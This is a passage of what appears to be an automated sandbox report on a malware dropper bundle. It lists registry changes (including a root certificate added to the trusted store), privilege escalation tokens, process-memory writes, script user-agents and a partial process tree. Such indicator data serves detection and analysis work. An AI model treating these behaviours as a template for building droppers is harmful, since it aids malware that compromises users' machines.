Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\expensivesurvey.online\ = "143" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\expensivesurvey.online\ = "47" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 Calculator.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 Calculator.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3560 PING.EXE -
Script User-Agent 7 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 37 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 87 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 598 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 603 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 705 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 720 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 722 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1428 powershell.exe 1428 powershell.exe 2988 powershell.exe 2988 powershell.exe 2988 powershell.exe 1428 powershell.exe 3908 Wed09b2a8bc4f16cb.exe 3908 Wed09b2a8bc4f16cb.exe 2988 powershell.exe 2988 powershell.exe 1428 powershell.exe 1428 powershell.exe 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 4216 Wed09d27135e5a8b3b.tmp 4216 Wed09d27135e5a8b3b.tmp 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3032 Explorer.EXE -
Suspicious behavior: MapViewOfSection 30 IoCs
pid Process 3908 Wed09b2a8bc4f16cb.exe 6608 ck_6NCtiU3bUjW3jzeMQBw0u.exe 1048 WpFILx0yw_EK8MsdJAiKhmLH.exe 4736 ck_6NCtiU3bUjW3jzeMQBw0u.exe 6608 ck_6NCtiU3bUjW3jzeMQBw0u.exe 6608 ck_6NCtiU3bUjW3jzeMQBw0u.exe 1048 WpFILx0yw_EK8MsdJAiKhmLH.exe 4736 ck_6NCtiU3bUjW3jzeMQBw0u.exe 4736 ck_6NCtiU3bUjW3jzeMQBw0u.exe 1048 WpFILx0yw_EK8MsdJAiKhmLH.exe 1048 WpFILx0yw_EK8MsdJAiKhmLH.exe 4056 0hp5lI2f2FoyQfBIrXA9ES2X.exe 6320 mstsc.exe 6320 mstsc.exe 5000 A8A6.exe 5912 C71D.exe 3900 MicrosoftEdgeCP.exe 8120 SG5COJhctDghfNe0iIIPrpP1.exe 6320 mstsc.exe 6320 mstsc.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 1228 4437894.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2392 Wed096a1bff61.exe Token: SeDebugPrivilege 2492 Wed09b3a5ca1a712d390.exe Token: SeDebugPrivilege 1428 powershell.exe Token: SeDebugPrivilege 2988 powershell.exe Token: SeCreateTokenPrivilege 3652 Wed09db0d52c38.exe Token: SeAssignPrimaryTokenPrivilege 3652 Wed09db0d52c38.exe Token: SeLockMemoryPrivilege 3652 Wed09db0d52c38.exe Token: SeIncreaseQuotaPrivilege 3652 Wed09db0d52c38.exe Token: SeMachineAccountPrivilege 3652 Wed09db0d52c38.exe Token: SeTcbPrivilege 3652 Wed09db0d52c38.exe Token: SeSecurityPrivilege 3652 Wed09db0d52c38.exe Token: SeTakeOwnershipPrivilege 3652 Wed09db0d52c38.exe Token: SeLoadDriverPrivilege 3652 Wed09db0d52c38.exe Token: SeSystemProfilePrivilege 3652 Wed09db0d52c38.exe Token: SeSystemtimePrivilege 3652 Wed09db0d52c38.exe Token: SeProfSingleProcessPrivilege 3652 Wed09db0d52c38.exe Token: SeIncBasePriorityPrivilege 3652 Wed09db0d52c38.exe Token: SeCreatePagefilePrivilege 3652 Wed09db0d52c38.exe Token: SeCreatePermanentPrivilege 3652 Wed09db0d52c38.exe Token: SeBackupPrivilege 3652 Wed09db0d52c38.exe Token: SeRestorePrivilege 3652 Wed09db0d52c38.exe Token: SeShutdownPrivilege 3652 Wed09db0d52c38.exe Token: SeDebugPrivilege 3652 Wed09db0d52c38.exe Token: SeAuditPrivilege 3652 Wed09db0d52c38.exe Token: SeSystemEnvironmentPrivilege 3652 Wed09db0d52c38.exe Token: SeChangeNotifyPrivilege 3652 Wed09db0d52c38.exe Token: SeRemoteShutdownPrivilege 3652 Wed09db0d52c38.exe Token: SeUndockPrivilege 3652 Wed09db0d52c38.exe Token: SeSyncAgentPrivilege 3652 Wed09db0d52c38.exe Token: SeEnableDelegationPrivilege 3652 Wed09db0d52c38.exe Token: SeManageVolumePrivilege 3652 Wed09db0d52c38.exe Token: SeImpersonatePrivilege 3652 Wed09db0d52c38.exe Token: SeCreateGlobalPrivilege 3652 Wed09db0d52c38.exe Token: 31 3652 Wed09db0d52c38.exe Token: 32 3652 Wed09db0d52c38.exe Token: 33 3652 Wed09db0d52c38.exe Token: 34 3652 Wed09db0d52c38.exe Token: 35 3652 Wed09db0d52c38.exe Token: SeDebugPrivilege 4108 BCleanSoft82.exe Token: SeDebugPrivilege 4424 4.exe Token: SeDebugPrivilege 4588 5.exe Token: SeDebugPrivilege 4172 10.exe Token: SeRestorePrivilege 5116 WerFault.exe Token: SeBackupPrivilege 5116 WerFault.exe Token: SeDebugPrivilege 5116 WerFault.exe Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 4216 Wed09d27135e5a8b3b.tmp 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1696 run2.exe 3032 Explorer.EXE 3032 Explorer.EXE 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 3032 Explorer.EXE 3032 Explorer.EXE 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 3032 Explorer.EXE 4268 MicrosoftEdge.exe 5156 MicrosoftEdge.exe 9232 MicrosoftEdgeCP.exe 9480 MicrosoftEdgeCP.exe 9684 MicrosoftEdge.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1760 wrote to memory of 1380 1760 setup_installer.exe 75 PID 1760 wrote to memory of 1380 1760 setup_installer.exe 75 PID 1760 wrote to memory of 1380 1760 setup_installer.exe 75 PID 1380 wrote to memory of 3620 1380 setup_install.exe 78 PID 1380 wrote to memory of 3620 1380 setup_install.exe 78 PID 1380 wrote to memory of 3620 1380 setup_install.exe 78 PID 1380 wrote to memory of 1348 1380 setup_install.exe 79 PID 1380 wrote to memory of 1348 1380 setup_install.exe 79 PID 1380 wrote to memory of 1348 1380 setup_install.exe 79 PID 1380 wrote to memory of 936 1380 setup_install.exe 80 PID 1380 wrote to memory of 936 1380 setup_install.exe 80 PID 1380 wrote to memory of 936 1380 setup_install.exe 80 PID 1380 wrote to memory of 1500 1380 setup_install.exe 92 PID 1380 wrote to memory of 1500 1380 setup_install.exe 92 PID 1380 wrote to memory of 1500 1380 setup_install.exe 92 PID 1380 wrote to memory of 1288 1380 setup_install.exe 91 PID 1380 wrote to memory of 1288 1380 setup_install.exe 91 PID 1380 wrote to memory of 1288 1380 setup_install.exe 91 PID 1380 wrote to memory of 2540 1380 setup_install.exe 81 PID 1380 wrote to memory of 2540 1380 setup_install.exe 81 PID 1380 wrote to memory of 2540 1380 setup_install.exe 81 PID 1380 wrote to memory of 3756 1380 setup_install.exe 90 PID 1380 wrote to memory of 3756 1380 setup_install.exe 90 PID 1380 wrote to memory of 3756 1380 setup_install.exe 90 PID 1348 wrote to memory of 2988 1348 cmd.exe 89 PID 1348 wrote to memory of 2988 1348 cmd.exe 89 PID 1348 wrote to memory of 2988 1348 cmd.exe 89 PID 3620 wrote to memory of 1428 3620 cmd.exe 88 PID 3620 wrote to memory of 1428 3620 cmd.exe 88 PID 3620 wrote to memory of 1428 3620 cmd.exe 88 PID 1380 wrote to memory of 2308 1380 setup_install.exe 87 PID 1380 wrote to memory of 2308 1380 setup_install.exe 87 PID 1380 wrote to memory of 2308 1380 setup_install.exe 87 PID 1380 wrote to memory of 3836 1380 setup_install.exe 86 PID 1380 wrote to memory of 3836 1380 setup_install.exe 86 PID 1380 wrote to memory of 3836 1380 setup_install.exe 86 PID 936 wrote to memory of 1224 936 cmd.exe 82 PID 936 wrote to memory of 1224 936 cmd.exe 82 PID 1380 wrote to memory of 1876 1380 setup_install.exe 83 PID 1380 wrote to memory of 1876 1380 setup_install.exe 83 PID 1380 wrote to memory of 1876 1380 setup_install.exe 83 PID 1380 wrote to memory of 2208 1380 setup_install.exe 85 PID 1380 wrote to memory of 2208 1380 setup_install.exe 85 PID 1380 wrote to memory of 2208 1380 setup_install.exe 85 PID 1380 wrote to memory of 3740 1380 setup_install.exe 84 PID 1380 wrote to memory of 3740 1380 setup_install.exe 84 PID 1380 wrote to memory of 3740 1380 setup_install.exe 84 PID 1380 wrote to memory of 2296 1380 setup_install.exe 95 PID 1380 wrote to memory of 2296 1380 setup_install.exe 95 PID 1380 wrote to memory of 2296 1380 setup_install.exe 95 PID 2540 wrote to memory of 2392 2540 cmd.exe 93 PID 2540 wrote to memory of 2392 2540 cmd.exe 93 PID 1380 wrote to memory of 2260 1380 setup_install.exe 94 PID 1380 wrote to memory of 2260 1380 setup_install.exe 94 PID 1380 wrote to memory of 2260 1380 setup_install.exe 94 PID 1380 wrote to memory of 2176 1380 setup_install.exe 113 PID 1380 wrote to memory of 2176 1380 setup_install.exe 113 PID 1380 wrote to memory of 2176 1380 setup_install.exe 113 PID 2308 wrote to memory of 3652 2308 cmd.exe 96 PID 2308 wrote to memory of 3652 2308 cmd.exe 96 PID 2308 wrote to memory of 3652 2308 cmd.exe 96 PID 1380 wrote to memory of 3096 1380 setup_install.exe 112 PID 1380 wrote to memory of 3096 1380 setup_install.exe 112 PID 1380 wrote to memory of 3096 1380 setup_install.exe 112
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3032 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0E656616\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
